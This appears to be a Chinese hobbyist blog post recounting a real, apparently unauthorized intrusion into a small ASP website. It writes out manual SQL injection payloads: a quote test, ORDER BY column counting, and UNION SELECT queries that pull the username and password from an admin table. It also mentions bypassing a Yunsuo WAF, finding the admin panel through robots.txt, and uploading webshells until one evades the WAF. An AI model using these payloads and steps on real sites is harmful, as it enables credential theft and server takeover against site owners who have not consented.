一开始接触该站

【萌新】记录一次渗透小站的过程


先随便翻阅了一些目录

发现在URL中 “/ProductView.asp?ID=1021    ” 这几个字段格外引人瞩目

于是 二话不说 看看有没有注入点

输入一个  '  看一看  发现报错了!!!

【萌新】记录一次渗透小站的过程

然后惯例 and 1=1, and 1=11

【萌新】记录一次渗透小站的过程

发现存在云锁   突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧!

云锁sql注入绕过漏洞

从这里我们发现一个绕过的漏洞

直接用firefox的hackerbar试试吧!

【萌新】记录一次渗透小站的过程

【萌新】记录一次渗透小站的过程

存在注入点! 那么继续手注吧!

构造语句:ProductView.asp?ID=1021 order by 30 发现 30不报错 31报错 那么有30的字段

【萌新】记录一次渗透小站的过程

【萌新】记录一次渗透小站的过程


继续构造注入语句 :ProductView.asp?ID=1021UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin

发现直接爆了出来

【萌新】记录一次渗透小站的过程


然后

ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,username,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin

ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin

运气不错 直接username password就试了出来

那么找下后台吧!

发现用了御剑 死都扫不出来

换个思路看看 robots.txt

【萌新】记录一次渗透小站的过程

试着试着 找到了 后台

不愧是天选之人

感觉都满顺利的

进入后台直接修改图片

【萌新】记录一次渗透小站的过程

发现可以直接上传sap文件 美滋滋、

上传了几个马子 发现都被云锁拦截了 最后快要放弃的时候 上传一个发现神奇的过了!

【萌新】记录一次渗透小站的过程

接下来发现想Net下 都不行 还是个菜鸡一个啊 还要继续学习

未完待续

相关文章:

  • 2021-06-03
  • 2022-12-23
  • 2021-06-03
  • 2021-11-28
  • 2022-01-04
  • 2021-11-18
  • 2021-12-27
  • 2022-12-23
猜你喜欢
  • 2021-10-19
  • 2021-09-11
  • 2021-09-14
  • 2022-01-18
  • 2021-04-02
  • 2021-12-16
相关资源
相似解决方案